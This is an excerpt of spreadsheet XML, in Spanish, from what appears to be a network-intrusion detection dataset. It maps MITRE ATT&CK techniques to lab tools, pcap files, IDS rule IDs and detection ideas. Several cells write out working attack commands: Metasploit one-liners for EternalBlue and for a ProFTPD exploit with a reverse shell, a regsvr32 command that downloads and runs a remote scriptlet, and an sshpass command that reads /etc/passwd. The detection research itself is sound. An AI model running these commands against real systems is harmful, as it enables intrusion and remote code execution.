    <t xml:space="preserve">Detección por anomalías y/o estegoanálisis, envío de imágenes o ficheros con formato poco común entre equipos, existencia de ficheros comprimidos sospechosos, etc. </t>
  </si>
  <si>
    <t>Manual [4] /  3.18</t>
  </si>
  <si>
    <t>Manual [4] / B.18</t>
  </si>
  <si>
    <t>Ingress Tool Transfer</t>
  </si>
  <si>
    <t>T1105</t>
  </si>
  <si>
    <t>Transferencia de archivos de un servidor C2 a un equipo previamente comprometido</t>
  </si>
  <si>
    <t>Metasploit, FTP</t>
  </si>
  <si>
    <t>T1105.pcapng</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002752,2002749,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2027768</t>
    </r>
  </si>
  <si>
    <t>Reglas genéricas que detecten un traspaso de archivos entre equipos utilizando protocolos de transferencia de ficheros como SMB, FTP... Dependiendo de las circunstancias del ataque tambien es importante detectar la transferencia de archivos malware que sean detectables mediante tráfico de red.</t>
  </si>
  <si>
    <t>Servidor FTP en el servidor C2. A través de la conexión del atacante a la víctima, usando el comando ftp transferimos herramientas desde el servidor C2 a la víctima</t>
  </si>
  <si>
    <t>Manual [5] /  3.5.8.1</t>
  </si>
  <si>
    <t>Data Encoding</t>
  </si>
  <si>
    <t>T1132</t>
  </si>
  <si>
    <t>Standard Encoding</t>
  </si>
  <si>
    <t>T1132.001</t>
  </si>
  <si>
    <t>Codificacion de mensajes entre la victima y el C2 Server mediante Base64</t>
  </si>
  <si>
    <t>Metasploit, curl, base64</t>
  </si>
  <si>
    <t>Deteccion por anomalias</t>
  </si>
  <si>
    <t>Servidor HTTP en el C2 Server. Intercambio de mensajes entre la victima y atacante mediante base64</t>
  </si>
  <si>
    <t>Manual [5] /  3.5.8.2</t>
  </si>
  <si>
    <t>Remote Access Software</t>
  </si>
  <si>
    <t>T1219</t>
  </si>
  <si>
    <t>Uso de TeamViewer para establecer canal de comunicación alternativo</t>
  </si>
  <si>
    <t>TeamViewer</t>
  </si>
  <si>
    <t>T1219-RemoteAccessSoftwareLocal_[5].pcapng, T1219-RemoteAccessSoftwareNAT_[5].pcapng</t>
  </si>
  <si>
    <t>Deteccion por listas negras/anomalías. Monitorizar tráfico de red correspondiente a softwares de acesso remoto(AnyDesk, TeamViewer...)</t>
  </si>
  <si>
    <t>Conexion mediante TeamViewer entre dos equipos</t>
  </si>
  <si>
    <t>Manual [5] /  3.5.8.3</t>
  </si>
  <si>
    <t>Dynamic Resolution</t>
  </si>
  <si>
    <t>T1568</t>
  </si>
  <si>
    <t>Fast Flux DNS</t>
  </si>
  <si>
    <t>T1568.001</t>
  </si>
  <si>
    <t>Esconder un C2 Server mediante un servidor DNS con bajo TTL y modo Fast Flux</t>
  </si>
  <si>
    <t>bind, Metasploit</t>
  </si>
  <si>
    <t>T1568-fastFluxDNS_[5].pcapng</t>
  </si>
  <si>
    <t>366,29456,384,408</t>
  </si>
  <si>
    <t>366,29456,384,408,2100366</t>
  </si>
  <si>
    <t>366,29456,384,408,2002752,2002749,2100366,2100384,2100408</t>
  </si>
  <si>
    <t>2002752, 2100384, 2100366, 2100408, 2002749</t>
  </si>
  <si>
    <t>Deteccion por anomalias o listas negras</t>
  </si>
  <si>
    <t>Servidor DNS "Round Robin"</t>
  </si>
  <si>
    <t>Manual [5] /  3.5.8.4</t>
  </si>
  <si>
    <t>Hide Infrastructure</t>
  </si>
  <si>
    <t>T1665</t>
  </si>
  <si>
    <t>Esconder el servidor C2 utilizando un Proxy</t>
  </si>
  <si>
    <t>Metasploit, HTTP Server</t>
  </si>
  <si>
    <t>T1665.pcapng</t>
  </si>
  <si>
    <t>2002752,2002749,2100628</t>
  </si>
  <si>
    <t>Detección por reglas/anomalías. Resulta importante monitorizar tráfico de red con destino a dominios incluidos en listas negras, conexiones a equpos externos...</t>
  </si>
  <si>
    <t>Esconder el servidor C2 utilizando un proxy</t>
  </si>
  <si>
    <t>Manual [5] /  3.5.8.5</t>
  </si>
  <si>
    <t>Protocol Tunneling</t>
  </si>
  <si>
    <t>T1572</t>
  </si>
  <si>
    <t>Tunelizar la conexión al C2 Server mediante SSH</t>
  </si>
  <si>
    <t>SSH, Metasploit</t>
  </si>
  <si>
    <t>T1572.pcapng</t>
  </si>
  <si>
    <t>Deteccion por anomalías, monitorizando la creacion de nuevas conexiones</t>
  </si>
  <si>
    <t>Tunelizar una conexion mediante SSH</t>
  </si>
  <si>
    <t>Manual [5] /  3.5.8.6</t>
  </si>
  <si>
    <t>Encrypted Channel</t>
  </si>
  <si>
    <t>T1573</t>
  </si>
  <si>
    <t>Assymetric Cryptography</t>
  </si>
  <si>
    <t>T1573.002</t>
  </si>
  <si>
    <t>Encriptar conexion con C2 Server</t>
  </si>
  <si>
    <t>Metasploit, OpenSSL</t>
  </si>
  <si>
    <t>T1573.002.pcapng</t>
  </si>
  <si>
    <t>Encriptar conexion al C2 Server</t>
  </si>
  <si>
    <t>Manual [5] /  3.5.8.7</t>
  </si>
  <si>
    <t>Non-Standard Port</t>
  </si>
  <si>
    <t>T1571</t>
  </si>
  <si>
    <t>Sesión SSH en puerto 2200</t>
  </si>
  <si>
    <t>ssh</t>
  </si>
  <si>
    <t>T1571.pcapng</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002752,2002749,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>13586</t>
    </r>
  </si>
  <si>
    <t>Establecer una sesion SSH sobre un puerto no estandar. Comando: sshpass -p salas ssh salas@192.168.2.2 -p 2200 cat /etc/passwd</t>
  </si>
  <si>
    <t>Manual [2] /  3.1.9.1</t>
  </si>
  <si>
    <t>Defense Evasion, Persistence</t>
  </si>
  <si>
    <t>Traffic Signaling</t>
  </si>
  <si>
    <t>T1205</t>
  </si>
  <si>
    <t>Port Knocking</t>
  </si>
  <si>
    <t>T1205.001</t>
  </si>
  <si>
    <t>Esconder y activar un puerto de forma remota</t>
  </si>
  <si>
    <t>Knockd</t>
  </si>
  <si>
    <t>T1205.001.pcapng</t>
  </si>
  <si>
    <t>Ocultar y activar un puerto remotamente, haciendo primero peticiones a ciertos puertos de forma secuencial. Comando: knock -v 172.16.2.2 7000 8000 9000</t>
  </si>
  <si>
    <t>Manual [3] /  3.8.11</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.11.4</t>
  </si>
  <si>
    <t>Indicator Removal</t>
  </si>
  <si>
    <t>T1070</t>
  </si>
  <si>
    <t>Network Share Connection Removal</t>
  </si>
  <si>
    <t>T1070.005</t>
  </si>
  <si>
    <t>Eliminación de conexiones establecidas via Network Share en Windows</t>
  </si>
  <si>
    <t>T1070-Indicator_removal_network_share_connection_removal_[4].pcapng</t>
  </si>
  <si>
    <t>Detección por anomalías basada en desconexión repentina procedente de una dirección de varios recursos compartidos</t>
  </si>
  <si>
    <t>Manual [4] /  3.8</t>
  </si>
  <si>
    <t>Manual [4] / B.8</t>
  </si>
  <si>
    <t>Modify Registry</t>
  </si>
  <si>
    <t>T1112</t>
  </si>
  <si>
    <t>Modificación del Registro de forma remota</t>
  </si>
  <si>
    <t>reg (Remoto)</t>
  </si>
  <si>
    <t>T1112-Modify_registry_[4].pcapng</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">44489, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>38319</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">44489, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>38319</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 2002752, 2002749, 2044666, 2051116</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">Regla que detecte el envío de mensajes con protocolo WINREG o Remote Registry Service </t>
  </si>
  <si>
    <t>Manual [4] /  3.9</t>
  </si>
  <si>
    <t>Manual [4] / B.9</t>
  </si>
  <si>
    <t>Rogue Domain Controller</t>
  </si>
  <si>
    <t>T1207</t>
  </si>
  <si>
    <t>DCShadow: registro de un DC fraudulento para habilitar la manipulación de datos en un entorno Active Directory</t>
  </si>
  <si>
    <t>T1207-Rogue_domain_controller_[4].pcapng</t>
  </si>
  <si>
    <t>Regla que detecte una llamada a la función DRSUAPI_REPLICA_ADD (5)</t>
  </si>
  <si>
    <t>Manual [4] /  3.10</t>
  </si>
  <si>
    <t>Manual [4] / B.10</t>
  </si>
  <si>
    <t>System Binary Proxy Execution</t>
  </si>
  <si>
    <t>T1218</t>
  </si>
  <si>
    <t>Regsvr32</t>
  </si>
  <si>
    <t>T1218.010</t>
  </si>
  <si>
    <t>Ejecución de COM scriptlet remoto</t>
  </si>
  <si>
    <t>Regsvr32.exe</t>
  </si>
  <si>
    <t>T1218.010.pcapng</t>
  </si>
  <si>
    <t>Aprovechar vulnerabilidad regsvr32.exe descargando y ejecutando scripts y librerias evadiendo controles de seguridad Windows. Comando: C:\Windows\system32\regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct scrobj.dll</t>
  </si>
  <si>
    <t>Manual [2] /  3.3.1.1</t>
  </si>
  <si>
    <t>Template Injection</t>
  </si>
  <si>
    <t>T1221</t>
  </si>
  <si>
    <t>Inyectar un fichero mediante Phishing .docx con macros modificadas que permita pasar desapercibido</t>
  </si>
  <si>
    <t>Sitios web convencionales (Gmail)</t>
  </si>
  <si>
    <t>T1221.pcapng</t>
  </si>
  <si>
    <t>402,50447,2002752,2002749,2013491,2013490,2009768,2100402</t>
  </si>
  <si>
    <t>Detección por lista negra/anomalías. Debería monitorizarse y detectar tráfico de red hacia direcciones o dominios marcados en listas negras. En algún caso concreto, se puede descargar y ejecutar malware por lo que se debe monitorizar y detectar la descarga de este tipo de ficheros</t>
  </si>
  <si>
    <t>Modificación de fichero .docx para, mediante macros, provocar la descarga y ejecución de malware en el equipo víctima</t>
  </si>
  <si>
    <t>Manual [5] /  3.5.4.1</t>
  </si>
  <si>
    <t>Network Boundary Bridging</t>
  </si>
  <si>
    <t>T1599</t>
  </si>
  <si>
    <t>NAT Traversal</t>
  </si>
  <si>
    <t>T1599.001</t>
  </si>
  <si>
    <t>Modificación de políticas de red para permitir tráfico externo a la red  interna</t>
  </si>
  <si>
    <t>iptables</t>
  </si>
  <si>
    <t>T1599-NBB1_[5].pcapng, T1599-NBB2_[5].pcapng</t>
  </si>
  <si>
    <t>Deteccion por anomalías</t>
  </si>
  <si>
    <t>Equipo intermedio entre red interna de la víctima y el atacante con firewall. El atacante con acceso a este equipo intermedio modifica las reglas del firewall iptables para permitir su tráfico.</t>
  </si>
  <si>
    <t>Manual [5] /  3.5.4.2</t>
  </si>
  <si>
    <t>Salto de VLAN</t>
  </si>
  <si>
    <t>T1599-Salto_vlan_[1].pcapng</t>
  </si>
  <si>
    <t>2101620, 2002752, 2002749</t>
  </si>
  <si>
    <t>Detección por anomalías y estudio de topología de red, que detecte posibles vulnerabilidades relacionadas con el etiquetado apilable 802.1Q</t>
  </si>
  <si>
    <t>Manual [1] /  3.2.1</t>
  </si>
  <si>
    <t>Manual [1] / E.4</t>
  </si>
  <si>
    <t>Build Image on Host</t>
  </si>
  <si>
    <t>T1612</t>
  </si>
  <si>
    <t>Creacion y montado de un contenedor con un servidor SSH sobre un equipo previamente vulnerado</t>
  </si>
  <si>
    <t>DockerAPI, SSH</t>
  </si>
  <si>
    <t>T1612-BuildImageOnHostLocal_[5].pcapng, T1612-BuildImageOnHostNAT_[5].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte descargas de contenedores mediante Docker API</t>
  </si>
  <si>
    <t>Construir contenedor sobre el equipo víctima para evitar ser detectados.</t>
  </si>
  <si>
    <t>Manual [5] /  3.5.4.3</t>
  </si>
  <si>
    <t>Lateral Movement</t>
  </si>
  <si>
    <t>Exploitation of Remote Services</t>
  </si>
  <si>
    <t>T1210</t>
  </si>
  <si>
    <t>EternalBlue</t>
  </si>
  <si>
    <t>T1210-Eternal_blue_[2].pcapng</t>
  </si>
  <si>
    <t>2102465,2025992,2025649,2025650,42944</t>
  </si>
  <si>
    <t>44487,44485,44489,5730,42944,2102465,2025992,2025649,2025650</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002752,2002749</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2044666,2023997,2044665,2102465,2025992,2025649,2025650,2024766,42944,44487,44485,44489,5730</t>
    </r>
  </si>
  <si>
    <t>Regla genérica que detecte uso de EternalBlue</t>
  </si>
  <si>
    <t>Uso de exploit Eternalblue para obtener movimiento lateral y establecimiento de meterpreter. Comando: msfconsole -x "use exploit/windows/smb/ms17_010_eternalblue; set RHOSTS 192.168.2.2; set LHOST 192.168.1.3; run -z; sessions -c getuid; sessions -k 1; exit"</t>
  </si>
  <si>
    <t>Manual [2] /  3.1.7.1</t>
  </si>
  <si>
    <t>Manual [4] / B.29</t>
  </si>
  <si>
    <t>Ataque Web</t>
  </si>
  <si>
    <t>DVWA, In-house selenium framework</t>
  </si>
  <si>
    <t>T1210-Web_attack-C2018_[6].pcapng</t>
  </si>
  <si>
    <t>Ejecución de código remoto basado en vulnerabilidades de servidor FTP</t>
  </si>
  <si>
    <t>T1210-Remote_code_execution_[2].pcapng</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>34225,34447,34224</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,50447</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002752,2002749,2010732,34225,34447,34224,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>50447</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">Regla genérica que detecte intento de ejecucion remota de codigo en servidor FTP </t>
  </si>
  <si>
    <t>Uso de comandos SITE/CPFR/CPTO en la version 1.3.5 de ProFTPD  que permite copiar ficheros a cualquier usuario no autenticado. Comando: msfconsole -x "use exploit/unix/ftp/proftpd_modcopy_exec; set RHOSTS 192.168.2.2; set SITEPATH /var/www/html; set LHOST 192.168.1.3; set LPORT 4444; set payload cmd/unix/reverse_perl; run -z; sessions -c ls; sessions -k 1; exit"</t>
  </si>
  <si>
    <t>Manual [2] /  3.1.7.2</t>
  </si>
  <si>
    <t>Manual [4] / B.30</t>
  </si>
  <si>
    <t>Remote Service Session Hijacking</t>
  </si>
  <si>
    <t>T1563</t>
  </si>
  <si>
    <t>RDP Hijacking</t>
  </si>
  <si>
    <t>T1563.002</t>
  </si>
  <si>
    <t>Secuestro de sesión RDP mediante tscon.exe</t>
  </si>
  <si>
    <t>tscon.exe</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002752, 2002749,2001117,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>1448</t>
    </r>
  </si>
  <si>
    <t>Regla genérica para detectar conexiones RDP entre un orígen y un servidor o destino</t>
  </si>
  <si>
    <t>Uso de Windows Server 2012 R2 con DNS, Active Directory y Servicio de Escritorio Remoto</t>
  </si>
  <si>
    <t>Manual [5] /  3.5.7.1</t>
  </si>
  <si>
    <t>Lateral Tool Transfer</t>
  </si>
  <si>
    <t>T1570</t>
  </si>
  <si>
    <t>Transferencia de herramientas para la continuación del ataque entre máquinas utilizando protocolos de compartición de archivos</t>
  </si>
  <si>
    <t>T1570.pcapng</t>
  </si>
  <si>
    <t>Transferencia mediante FTP de ficheros entre dos equipos</t>
  </si>
  <si>
    <t>Manual [5] /  3.5.7.2</t>
  </si>
  <si>
    <t>Internal Spear-phishing</t>
  </si>
  <si>
    <t>T1534</t>
  </si>
  <si>
    <t>Phishing interno entre equipos pertenecientes a un dominio con servidor de correo habilitado</t>
  </si>
  <si>
    <t>MailEnabler, Thunderbird</t>
  </si>
  <si>
    <t>T1534-Internal_spearphishing_[4].pcapng</t>
  </si>
  <si>
    <t>Detección por anomalías, análisis de la estructura de correos electrónicos, petición de información confidencial, etc</t>
  </si>
  <si>
    <t>Manual [4] /  3.14</t>
  </si>
  <si>
    <t>Manual [4] / B.14</t>
  </si>
  <si>
    <t>Network Service Discovery</t>
  </si>
  <si>
    <t>T1046</t>
  </si>
  <si>
    <t>Descubrimiento de servicios y version</t>
  </si>
  <si>
    <t>Nikto</t>
  </si>
  <si>
    <t>T1046-Version_services_detection1_[3].pcapng</t>
  </si>
  <si>
    <t>??????</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2002677, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2101071</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,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r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">50447, 300003, 31940, 2002677, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2101071</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 2101242, 2027262, 2016141, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2101129</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2100987</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,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r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">50447, 300003, 31940, 2002752, 2002749, 2002677, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2101071</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 2101242, 2027262, 2016141, 2003595, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2101129</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2100987</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,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2006446,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t>
    </r>
  </si>
  <si>
    <t>Múltiples mecanismos. Por ejemplo, regla que detecte un escaneo de puertos (alto número de peticiones hacia un rango de puertos en poco tiempo)</t>
  </si>
  <si>
    <t>Manual [3] /  3.8.3</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.3.4</t>
  </si>
  <si>
    <t>T1046-Version_services_detection2_[3].pcapng</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>384,453,408,451,1421,1420,1418,257,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>598</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010937,2010939,2010938</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2002911</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2010936,2010935,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002910</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2100257,2100598,2009358,2024364,384,453,408,451,1421,1420,1418,257,598</t>
    </r>
  </si>
  <si>
    <t>2010937, 2002910, 2010935</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010937,2010939,2010938,2002911,2010936,2010935,2002910,2100257,2100598</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2009358</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2024364,384,453,408,451,1421,1420,1418,257,598,36650,13586,50447</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2100469,2100384,2002752,2002749</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2009582,2000538</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2100453,2100408,2100451,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010937</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2001689</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2010939</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010938</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002911</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2100615,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010936</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010935</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002910</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2101420,2101418,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2100257</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2100598</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2009358</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2024364,384,453,408,451,1421,1420,1418,257,598,36650,13586,50447</t>
    </r>
  </si>
  <si>
    <t>2100384, 2002752, 2100615, 2009582, 2100469, 2010935, 2100408, 2010937, 2002749, 2002910, 2002911</t>
  </si>
  <si>
    <t>DDos + Escaneo de puertos</t>
  </si>
  <si>
    <t>T1046-C2018_[6].pcapng</t>
  </si>
  <si>
    <t>2035480, 2025644</t>
  </si>
  <si>
    <t>2002749, 2002752, 2035480, 20000419, 2025644</t>
  </si>
  <si>
    <t>En determinadas circunstancias, si el envío de paquetes constituye una amenaza de denegación de servicio, podría detectarse el envío masivo de paquetes</t>
  </si>
  <si>
    <t>Remote System Discovery</t>
  </si>
  <si>
    <t>T1018</t>
  </si>
  <si>
    <t>Descubrimiento de servicios y puertos</t>
  </si>
  <si>
    <t>T1018.pcapng</t>
  </si>
  <si>
    <t>2010937, 2010935, 2010936, 2010939, 2002910, 200911</t>
  </si>
  <si>
    <t>2010937, 2010935, 2010936, 2010939, 2002910, 200911, 2002752, 2002749, 2101418, 2100615</t>
  </si>
  <si>
    <t>2002752, 2100615, 2010935, 2010937, 2002749, 2002910</t>
  </si>
  <si>
    <t>Regla que detecte envío de mútliples peticiones a un rango de puertos en un tiempo determinado</t>
  </si>
  <si>
    <t>Manual [3] /  3.8.1</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.1.4</t>
  </si>
  <si>
    <t>Group Policy Discovery</t>
  </si>
  <si>
    <t>T1615</t>
  </si>
  <si>
    <t>Comandos mediante Powershell para obtener información sobre configuraciones de políticas de grupo</t>
  </si>
  <si>
    <t>T1615.pcapng</t>
  </si>
  <si>
    <t>Detección por anomalías</t>
  </si>
  <si>
    <t>Ejecución de comandos mediante Powershell para comprobar políticas de grupo</t>
  </si>
  <si>
    <t>Manual [5] /  3.5.6.1</t>
  </si>
  <si>
    <t>System Owner</t>
  </si>
  <si>
    <t>T1033</t>
  </si>
  <si>
    <t>Descubrimiento de sesión de usuario en equipo remoto</t>
  </si>
  <si>
    <t>quser, qwinsta</t>
  </si>
  <si>
    <t>T1033-System_owner_[4].pcapng</t>
  </si>
  <si>
    <t>44489, 2002752, 2002749, 2044666, 2051116</t>
